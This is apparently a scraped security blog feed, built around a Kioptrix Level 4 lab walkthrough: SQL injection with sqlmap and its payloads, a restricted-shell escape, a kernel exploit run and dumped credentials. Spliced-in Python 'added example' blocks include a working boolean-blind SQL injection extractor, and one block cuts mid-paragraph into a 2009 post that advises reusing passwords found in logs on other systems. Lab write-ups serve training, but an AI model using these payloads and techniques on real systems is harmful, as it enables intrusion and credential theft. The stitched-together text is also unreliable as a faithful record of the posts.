+-----------------+<br />
| Tables_in_login |<br />
+-----------------+<br />
| user_name |<br />
| users |<br />
+-----------------+<br />
2 rows in set (0.00 sec)<br />
<br />
mysql> use login;<br />
Reading table information for completion of table and column names<br />
You can turn off this feature to get a quicker startup with -A<br />
<br />
Database changed<br />
mysql> select * from users;<br />
+-----------+----------+<br />
| user_name | password |<br />
+-----------+----------+<br />
| candyshop | password |<br />
| Sir | PopRocks |<br />
+-----------+----------+<br />
2 rows in set (0.00 sec)<br />
<br />
mysql><br />
<br />
______________________________________________________________________________<br />
<br />
<br />
So this yielded a little more information. I chose not to continue enumerating and instead tried the same reused password against the system root account, and bingo!<br />
<br />
I pwned the box:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUAJAmVYNBesHUFceL83f7t1R0LR_USqfAiNOj9axykqzvbV8yJ6sDBY_3XI2o2bbjftCe1LhYwIZ3T3UsIyhdhlmm3dMY_nisA_WqKYRMhAKL3wTqzMVzkg7dm2lARrnzzLtIazAW_C4E/s1600/Screenshot+from+2015-05-27+00%253A43%253A29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUAJAmVYNBesHUFceL83f7t1R0LR_USqfAiNOj9axykqzvbV8yJ6sDBY_3XI2o2bbjftCe1LhYwIZ3T3UsIyhdhlmm3dMY_nisA_WqKYRMhAKL3wTqzMVzkg7dm2lARrnzzLtIazAW_C4E/s400/Screenshot+from+2015-05-27+00%253A43%253A29.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Overall, I enjoyed this VM challenge due to its realism. Some challenges are fun and thought-provoking, but I enjoy the ones that mimic real-world systems and human mistakes. Thanks to the guys at <a href="http://www.top-hat-sec.com/" target="_blank">Top-Hat-Sec</a>.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Court Graham, CISSP, OSCP, CEH, PCI-QSA, ITIL </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br /></div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-84864072316435942692015-05-22T12:18:00.001-04:002015-05-22T12:18:30.422-04:00Kioptrix Level 4 Walkthrough<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<br /></div>
This is the first in a long series of vulnerable virtual machine walkthroughs that I'll be posting to this site. By looking at the date of my last post, one would assume that I've gone dormant, but that's definitely not the case. So without further ado, I bring you Kioptrix Level 4.<br />
<br />
<b>Enumeration</b><br />
<b><br /></b>
root@kali:~# nmap 10.1.1.10<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-21 09:05 EDT<br />
Nmap scan report for 10.1.1.10<br />
Host is up (0.00032s latency).<br />
Not shown: 566 closed ports, 430 filtered ports<br />
PORT STATE SERVICE<br />
22/tcp open ssh<br />
80/tcp open http<br />
139/tcp open netbios-ssn<br />
445/tcp open microsoft-ds<br />
MAC Address: 08:00:27:C2:50:41 (Cadmus Computer Systems)<br />
<br /><br />
Nmap done: 19 IP addresses (3 hosts up) scanned in 9.10 seconds<br />
root@kali:~#<br />
<br />
<br />
<b>Visiting the web page on port 80 revealed a login page that looked like a candidate for SQL injection:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPi96JMo0PegEVHCc4RjybY7UK153Ycq7xDSrMaKZT2E1R3GYWMqAjpMfqLyKlgPHRzq9yXRnChFLK0id7ZvoKpZ_ELyAx11mNSNPyseUZ0HiZFTlvy9Ou1DwGGxWhKqgvq3Uu1_KAkbSQ/s1600/Screenshot+from+2015-05-21+09%253A37%253A28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPi96JMo0PegEVHCc4RjybY7UK153Ycq7xDSrMaKZT2E1R3GYWMqAjpMfqLyKlgPHRzq9yXRnChFLK0id7ZvoKpZ_ELyAx11mNSNPyseUZ0HiZFTlvy9Ou1DwGGxWhKqgvq3Uu1_KAkbSQ/s320/Screenshot+from+2015-05-21+09%253A37%253A28.png" width="320" /></a></b></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<b>Using a bunch of the usual combinations, I was able to provoke the site into revealing the underlying DBMS (MySQL):</b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4wOUE4WWvWl5eWie5zMw2wZo0Fo8UC2FH0hLMYSwYqzdshxUHTJWLAmgzlccPu_IysVkAlSmLB6MVaWlcGVNkxtEuTCHgiKa5mrGa87xnrlQG_D46xiaP0X6Ua4Vk5Z2b3g-lFnT07kDN/s1600/Screenshot+from+2015-05-21+09%253A43%253A46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4wOUE4WWvWl5eWie5zMw2wZo0Fo8UC2FH0hLMYSwYqzdshxUHTJWLAmgzlccPu_IysVkAlSmLB6MVaWlcGVNkxtEuTCHgiKa5mrGa87xnrlQG_D46xiaP0X6Ua4Vk5Z2b3g-lFnT07kDN/s320/Screenshot+from+2015-05-21+09%253A43%253A46.png" /></a></div>
<b>With this information I could hand sqlmap the back-end DBMS up front (--dbms=MySQL) instead of letting it fingerprint it.</b><br />
<b>sqlmap output</b><br />
<b><br /></b>
root@kali:~# sqlmap -u "http://10.1.1.10/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump<br />
sqlmap/1.0-dev - automatic SQL injection and database takeover tool<br />
http://sqlmap.org<br />
<br />
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program<br />
<br />
[*] starting at 09:14:03<br />
<br />
[09:14:03] [INFO] testing connection to the target URL<br />
[09:14:04] [INFO] heuristics detected web page charset 'ascii'<br />
[09:14:04] [INFO] testing if the target URL is stable. This can take a couple of seconds<br />
[09:14:05] [INFO] target URL is stable<br />
[09:14:05] [INFO] testing if POST parameter 'myusername' is dynamic<br />
[09:14:05] [WARNING] POST parameter 'myusername' does not appear dynamic<br />
[09:14:05] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable<br />
[09:14:05] [INFO] testing for SQL injection on POST parameter 'myusername'<br />
[09:14:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'<br />
[09:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'<br />
[09:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'<br />
[09:14:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'<br />
[09:14:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'<br />
[09:14:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'<br />
[09:14:09] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'<br />
[09:14:10] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'<br />
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'<br />
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'<br />
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'<br />
[09:14:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'<br />
[09:14:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'<br />
[09:14:10] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'<br />
[09:14:10] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'<br />
[09:14:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'<br />
[09:14:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'<br />
[09:14:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'<br />
[09:14:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'<br />
[09:14:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'<br />
[09:14:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'<br />
[09:14:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'<br />
[09:14:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'<br />
[09:14:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'<br />
<b>Blah, blah, blah...................blah...........Ultimately revealing usernames and passwords within the underlying database</b><br />
Place: POST<br />
Parameter: mypassword<br />
Type: boolean-based blind<br />
Title: OR boolean-based blind - WHERE or HAVING clause<br />
Payload: myusername=admin&mypassword=-4827' OR (7207=7207) AND 'wyxA'='wyxA<br />
<br />
Type: AND/OR time-based blind<br />
Title: MySQL < 5.0.12 AND time-based blind (heavy query)<br />
Payload: myusername=admin&mypassword=test' AND 8831=BENCHMARK(5000000,MD5(0x46556262)) AND 'KxNZ'='KxNZ<br />
---<br />
[09:16:14] [INFO] testing MySQL<br />
[09:16:14] [INFO] confirming MySQL<br />
[09:16:14] [INFO] the back-end DBMS is MySQL<br />
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)<br />
web application technology: PHP 5.2.4, Apache 2.2.8<br />
back-end DBMS: MySQL >= 5.0.0<br />
[09:16:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries<br />
[09:16:14] [INFO] fetching current database<br />
[09:16:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br />
[09:16:14] [INFO] retrieved: members<br />
[09:16:15] [INFO] fetching tables for database: 'members'<br />
[09:16:15] [INFO] fetching number of tables for database 'members'<br />
[09:16:15] [INFO] retrieved: 1<br />
[09:16:15] [INFO] retrieved: members<br />
[09:16:15] [INFO] fetching columns for table 'members' in database 'members'<br />
[09:16:15] [INFO] retrieved: 3<br />
[09:16:15] [INFO] retrieved: id<br />
[09:16:16] [INFO] retrieved: username<br />
[09:16:16] [INFO] retrieved: password<br />
[09:16:17] [INFO] fetching entries for table 'members' in database 'members'<br />
[09:16:17] [INFO] fetching number of entries for table 'members' in database 'members'<br />
[09:16:17] [INFO] retrieved: 2<br />
[09:16:17] [INFO] retrieved: 1<br />
[09:16:17] [INFO] retrieved: MyNameIsJohn<br />
[09:16:18] [INFO] retrieved: john<br />
[09:16:18] [INFO] retrieved: 2<br />
[09:16:19] [INFO] retrieved: ADGAdsafdfwt4gadfga==<br />
[09:16:20] [INFO] retrieved: robert<br />
[09:16:21] [INFO] analyzing table dump for possible password hashes<br />
Database: members<br />
Table: members<br />
[2 entries]<br />
+----+----------+-----------------------+<br />
| id | username | password |<br />
+----+----------+-----------------------+<br />
| 1 | john | MyNameIsJohn |<br />
| 2 | robert | ADGAdsafdfwt4gadfga== |<br />
+----+----------+-----------------------+<br />
<br />
[09:16:21] [INFO] table 'members.members' dumped to CSV file '/usr/share/sqlmap/output/10.1.1.10/dump/members/members.csv'<br />
[09:16:21] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/10.1.1.10'<br />
<br />
[*] shutting down at 09:16:21<br />
<br />
root@kali:~#<br />
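sqlmap's log hides what the injection actually does to the query. The following is an added example written for this post, not code from the Kioptrix VM, from checklogin.php or from sqlmap: a checklogin.php-style string-built query rebuilt in Python over an in-memory SQLite table (a constructed stand-in for the members table, holding the two rows from the dump), driven with the exact boolean-based payload sqlmap reported, beside the parameterized version that turns the same payload into a plain wrong password. It also reproduces the boolean-blind extraction sqlmap performed above ("retrieved: MyNameIsJohn") with a binary search over one yes/no oracle per character; SQLite's unicode() and substr() stand in for MySQL's ASCII() and SUBSTRING().

```python
"""Vulnerable vs. parameterized login check, driven with the boolean-blind payload sqlmap found (added example)."""
import sqlite3


def make_db():
    """Constructed stand-in for the 'members' table sqlmap dumped; SQLite replaces MySQL so this runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members (username, password) VALUES (?, ?)",
                     [("john", "MyNameIsJohn"), ("robert", "ADGAdsafdfwt4gadfga==")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The checklogin.php anti-pattern: user input is pasted into the SQL string, so a quote ends the literal."""
    sql = f"SELECT username FROM members WHERE username='{username}' AND password='{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """The fix: placeholders keep the input as data, so the same payload is just a wrong password."""
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Payload exactly as reported by sqlmap above, minus the closing quote the application supplies.
# AND binds tighter than OR, so the WHERE becomes (user AND pass) OR (TRUE AND TRUE): every row matches.
SQLMAP_PAYLOAD = "-4827' OR (7207=7207) AND 'wyxA'='wyxA"


def blind_oracle(conn, condition):
    """One yes/no question to the database: does the page log us in when `condition` is true?"""
    return login_vulnerable(conn, "admin", f"x' OR ({condition}) AND 'a'='a") is not None


def extract_string(conn, subquery, max_len=64):
    """Boolean-based blind extraction: rebuild a value one character at a time, binary-searching each code point."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if blind_oracle(conn, f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr past the end is '', unicode('') is NULL, every comparison is false: end of string
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", login_vulnerable(db, "admin", SQLMAP_PAYLOAD))     # logs in as the first row
    print("parameterized:", login_parameterized(db, "admin", SQLMAP_PAYLOAD))  # None
    print("blind dump   :", extract_string(db, "SELECT password FROM members WHERE id=1"))
```

Seven queries per character is what "retrieved: MyNameIsJohn" cost sqlmap here; the time-based variant it also reported (BENCHMARK) uses the same loop with response delay as the oracle instead of login success.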
<b><br /></b>
<b><br /></b>
<b>Now let's attempt to SSH in with john's credentials</b><br />
<b><br /></b>
root@kali:~# ssh john@10.1.1.10<br />
The authenticity of host '10.1.1.10 (10.1.1.10)' can't be established.<br />
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.<br />
Are you sure you want to continue connecting (yes/no)? yes<br />
Warning: Permanently added '10.1.1.10' (RSA) to the list of known hosts.<br />
john@10.1.1.10's password: <br />
Connection closed by 10.1.1.10<br />
root@kali:~# ssh john@10.1.1.10<br />
john@10.1.1.10's password: <br />
Welcome to LigGoat Security Systems - We are Watching<br />
== Welcome LigGoat Employee ==<br />
LigGoat Shell is in place so you don't screw up<br />
Type '?' or 'help' to get the list of allowed commands<br />
john:~$ ?<br />
cd clear echo exit help ll lpath ls<br />
<br />
<b>Awesome, the credentials worked, but now we're trapped in a stupid restricted shell... how do we escape?</b><br />
<b><br /></b>
Research on how to escape this shell led me to the following page on lshell, the restricted shell in use here:<br />
<a href="http://www.aldeid.com/wiki/Lshell">http://www.aldeid.com/wiki/Lshell</a><br />
<br />
<b>Worked like a charm!</b><br />
<br />
john:~$ echo os.system('/bin/bash')<br />
john@Kioptrix4:~$<br />
<br />
<br />
john@Kioptrix4:~$ uname -a<br />
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux<br />
<br />
<b>Now time to take a look around and escalate privilege; this 2.6.24 kernel looks vulnerable to some of the old favorites.</b><br />
<b><br /></b>
john@Kioptrix4:~$ cat /etc/sudoers<br />
cat: /etc/sudoers: Permission denied<br />
john@Kioptrix4:~$ cat /etc/passwd<br />
root:x:0:0:root:/root:/bin/bash<br />
daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />
bin:x:2:2:bin:/bin:/bin/sh<br />
sys:x:3:3:sys:/dev:/bin/sh<br />
sync:x:4:65534:sync:/bin:/bin/sync<br />
games:x:5:60:games:/usr/games:/bin/sh<br />
man:x:6:12:man:/var/cache/man:/bin/sh<br />
lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />
mail:x:8:8:mail:/var/mail:/bin/sh<br />
news:x:9:9:news:/var/spool/news:/bin/sh<br />
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />
proxy:x:13:13:proxy:/bin:/bin/sh<br />
www-data:x:33:33:www-data:/var/www:/bin/sh<br />
backup:x:34:34:backup:/var/backups:/bin/sh<br />
list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />
irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br />
libuuid:x:100:101::/var/lib/libuuid:/bin/sh<br />
dhcp:x:101:102::/nonexistent:/bin/false<br />
syslog:x:102:103::/home/syslog:/bin/false<br />
klog:x:103:104::/home/klog:/bin/false<br />
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false<br />
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin<br />
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash<br />
john:x:1001:1001:,,,:/home/john:/bin/kshell<br />
robert:x:1002:1002:,,,:/home/robert:/bin/kshell<br />
john@Kioptrix4:~$ pwd<br />
/home/john<br />
john@Kioptrix4:~$ ls<br />
john@Kioptrix4:~$ cd ..<br />
john@Kioptrix4:/home$ ls<br />
john loneferret robert<br />
john@Kioptrix4:/home$ cd loneferret<br />
john@Kioptrix4:/home/loneferret$ ls<br />
john@Kioptrix4:/home/loneferret$ ls -al<br />
total 44<br />
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .<br />
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..<br />
-rw------- 1 loneferret loneferret 62 2012-02-06 20:24 .bash_history<br />
-rw-r--r-- 1 loneferret loneferret 220 2012-02-04 09:58 .bash_logout<br />
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc<br />
-rw-r--r-- 1 loneferret loneferret 1 2012-02-05 10:37 .lhistory<br />
-rw------- 1 root root 68 2012-02-04 10:05 .my.cnf.5086<br />
-rw------- 1 root root 1 2012-02-04 10:05 .mysql.5086<br />
-rw------- 1 loneferret loneferret 1 2012-02-05 10:38 .mysql_history<br />
-rw------- 1 loneferret loneferret 9 2012-02-06 16:39 .nano_history<br />
-rw-r--r-- 1 loneferret loneferret 586 2012-02-04 09:58 .profile<br />
-rw-r--r-- 1 loneferret loneferret 0 2012-02-04 10:01 .sudo_as_admin_successful<br />
john@Kioptrix4:/home/loneferret$ more .sudo_as_admin_successful <br />
john@Kioptrix4:/home/loneferret$ more .bash_history <br />
.bash_history: Permission denied<br />
<br />
<b>As you can see, I came across lots of interesting things, including MySQL files and nice stuff in user directories, but it was my old faithful Linux sendpage exploit that brought home the bacon.</b><br />
<br />
<br />
john@Kioptrix4:~$ ./sendpage <br />
#<br />
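Before burning a kernel exploit, the /etc/passwd listing above is worth triaging systematically: who else has uid 0, which accounts are real people (their dotfiles and histories are where reused passwords live), which accounts have a non-standard shell (here /bin/kshell, the restricted shell that caged john), and whether any hash sits in passwd itself. The script below is an added example for this post, not part of Kioptrix or of the original write-up; its input is a subset of the listing above plus one constructed uid-0 line (toor) so that check has something to fire on.

```python
"""Triage an /etc/passwd listing for privilege-escalation leads (added example)."""

# Subset of the listing above, plus one constructed line (toor) so the uid-0 check has something to fire on.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
toor:x:0:0:constructed for the demo:/root:/bin/bash
"""

# Shells that need no second look; anything else (rbash, lshell wrappers, custom binaries) is worth reading.
STANDARD_SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/false", "/bin/sync",
                   "/usr/sbin/nologin", "/sbin/nologin"}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; a malformed line is an error, not something to skip silently."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "passwd": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def triage(entries):
    """The questions worth asking before reaching for a kernel exploit."""
    return {
        # any second uid-0 account is either a backdoor or a misconfiguration; both are interesting
        "extra_uid0": [e["name"] for e in entries if e["uid"] == 0 and e["name"] != "root"],
        # real people: their homes, histories and dotfiles are where reused passwords live
        "human_accounts": [e["name"] for e in entries if e["uid"] >= 1000 and e["name"] != "nobody"],
        # restricted or custom shells: here /bin/kshell is the restricted shell the walkthrough escaped
        "nonstandard_shells": {e["name"]: e["shell"] for e in entries if e["shell"] not in STANDARD_SHELLS},
        # a hash in field 2 instead of 'x' means the box never moved to shadow passwords
        "hash_in_passwd": [e["name"] for e in entries if e["passwd"] not in ("x", "*", "!", "")],
    }


if __name__ == "__main__":
    for key, value in triage(parse_passwd(SAMPLE_PASSWD)).items():
        print(f"{key}: {value}")
```

On a live box feed it `open("/etc/passwd").read()`; the human_accounts list is the one to walk next (ls -la on each home, as done above for loneferret), and every shell in nonstandard_shells deserves a `file` and a read of its config before assuming it is a real cage.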
<br />
<br />
<br />
<br />
<br />
<br /></div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-62609493610274659262009-10-27T00:17:00.000-04:002009-10-27T00:26:40.880-04:00What will happen to Metasploit??With Rapid7's acquisition of the open source pentest tool Metasploit Framework (http://www.metasploit.com) last week, I can't help but ask the question: what will happen to it? The folks at Rapid7 assure that the tool will remain free, and will likely improve due to the internal collaboration. I think that they are wanting to find a way to creep up on Core Impact (http://www.coresecurity.com), the incredible but expensive automated pentesting tool. Metasploit has served as a great free option for those who care to spend the time.<br /><br />What's next? Only time will tell...Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-11978413005907176792009-10-21T12:44:00.000-04:002009-10-21T13:28:13.555-04:00Passwords in Log Files<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6AzE1iXkXt-UdCBddbO2iPrUk5nGpSa5fMinF0zQktm3OFaRDfncQL0baUEpAYDUvGezBEG4io6V3gh0IBUUZW4bD9ebVRV7ICpL6zPZaF2XJ-Zx5Lm083uDf8O6cm8rSwDi9vrvdrjdO/s1600-h/screen.bmp"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 196px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6AzE1iXkXt-UdCBddbO2iPrUk5nGpSa5fMinF0zQktm3OFaRDfncQL0baUEpAYDUvGezBEG4io6V3gh0IBUUZW4bD9ebVRV7ICpL6zPZaF2XJ-Zx5Lm083uDf8O6cm8rSwDi9vrvdrjdO/s320/screen.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5395106310519999202" /></a><br /><br /><br />Protect access to your log files. Time and time again, I've conducted penetration tests and gained access to authentication logs on some box along the way. 
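An added example for this post (not the author's tooling) that automates the hunt described here: scan OpenSSH auth.log entries for an "Invalid user" whose name looks like a typed secret rather than a login name, then look for a successful login from the same source address shortly afterwards to guess whose password it was. The log lines are constructed for the demo; the username heuristic, the list of commonly sprayed names and the five-minute window are assumptions to tune per environment.

```python
"""Find passwords mistyped into the username field of SSH logins in auth.log (added example)."""
import re
from datetime import datetime

# Constructed auth.log excerpt in OpenSSH syslog format; not from any real system.
SAMPLE_AUTH_LOG = """\
Oct 21 12:31:02 web1 sshd[2211]: Invalid user Summer2009! from 10.1.1.50
Oct 21 12:31:09 web1 sshd[2211]: Failed password for invalid user Summer2009! from 10.1.1.50 port 51022 ssh2
Oct 21 12:31:15 web1 sshd[2214]: Accepted password for jdoe from 10.1.1.50 port 51023 ssh2
Oct 21 12:40:41 web1 sshd[2290]: Invalid user admin from 10.1.1.77
Oct 21 12:40:44 web1 sshd[2290]: Failed password for invalid user admin from 10.1.1.77 port 40111 ssh2
Oct 21 12:41:02 web1 sshd[2301]: Failed password for root from 10.1.1.77 port 40112 ssh2
""".splitlines()

LOG_RE = re.compile(r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<msg>.*)$")
INVALID_RE = re.compile(r"^Invalid user (?P<user>.+?) from (?P<ip>[\d.]+)")
ACCEPTED_RE = re.compile(r"^Accepted \w+ for (?P<user>\S+) from (?P<ip>[\d.]+)")

# Assumptions to tune per site: names attackers spray constantly, and the character set real logins use.
COMMON_USERNAMES = {"admin", "root", "test", "guest", "user", "oracle", "postgres", "ubuntu", "pi"}
LOGIN_NAME_CHARS = set("abcdefghijklmnopqrstuvwxyz0123456789-_.")


def looks_like_password(name):
    """Heuristic: a 'username' with mixed case, digits and punctuation is usually a secret typed in the wrong box."""
    if name.lower() in COMMON_USERNAMES:
        return False
    classes = sum((any(c.islower() for c in name), any(c.isupper() for c in name),
                   any(c.isdigit() for c in name), any(not c.isalnum() for c in name)))
    return classes >= 3 or any(c not in LOGIN_NAME_CHARS for c in name)


def parse_events(lines):
    """Reduce the log to (time, kind, user, ip) tuples for invalid-user and accepted-login events."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # syslog has no year; fine for deltas
        msg = m.group("msg")
        im = INVALID_RE.match(msg)
        if im:
            events.append((ts, "invalid", im.group("user"), im.group("ip")))
            continue
        am = ACCEPTED_RE.match(msg)
        if am:
            events.append((ts, "accepted", am.group("user"), am.group("ip")))
    return events


def find_leaked_passwords(lines, window_seconds=300):
    """Pair each password-looking invalid user with the next successful login from the same address."""
    events = parse_events(lines)
    leaks = []
    for i, (ts, kind, user, ip) in enumerate(events):
        if kind != "invalid" or not looks_like_password(user):
            continue
        owner = None
        for ts2, kind2, user2, ip2 in events[i + 1:]:
            if (ts2 - ts).total_seconds() > window_seconds:
                break
            if kind2 == "accepted" and ip2 == ip:
                owner = user2
                break
        leaks.append({"secret": user, "ip": ip, "likely_owner": owner, "time": ts.strftime("%b %d %H:%M:%S")})
    return leaks


if __name__ == "__main__":
    for leak in find_leaked_passwords(SAMPLE_AUTH_LOG):
        print(f"{leak['time']} {leak['ip']}: '{leak['secret']}' looks like a password, "
              f"probably {leak['likely_owner'] or 'unknown'}'s")
```

The same pairing works from the defender's side as a scheduled check that forces a password reset for the likely owner, and it is a concrete reason to keep auth.log readable only by root and the log-shipping account.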
Often, somewhere in the numerous entries, you'll find someone who has mistakenly entered their password as their username. <br /><br /><br /><br />Take that username/password pair and use it to gain access to other systems. There is no telling where it can take you.Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-6233680723032518802009-10-20T00:15:00.000-04:002009-10-20T00:39:16.429-04:00The President on Cyber SecurityThe President brings attention to the threats of Information Warfare and Cyber Crime. It's a good day to be a security professional. <br /><br /><br /><object width="560" height="340"><param name="movie" value="http://www.youtube.com/v/wjfzyj4eyQM&hl=en&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/wjfzyj4eyQM&hl=en&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"></embed></object>Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-528453722764456762009-04-04T22:19:00.000-04:002009-04-04T22:39:31.571-04:00Hurry up and Wait!This week was all about Conficker. I'm actually pretty appreciative of the attention this worm commanded. The best of both worlds for Information Security practitioners: widespread publicity grabbing the attention of company executives, sysadmins, and the average Joe, but without actually bringing down the universe. But what now? Nobody knows. What I do know is this event educated many people who otherwise had no idea of the implications of unpatched systems, lack of antivirus and the power of worms and botnets. 
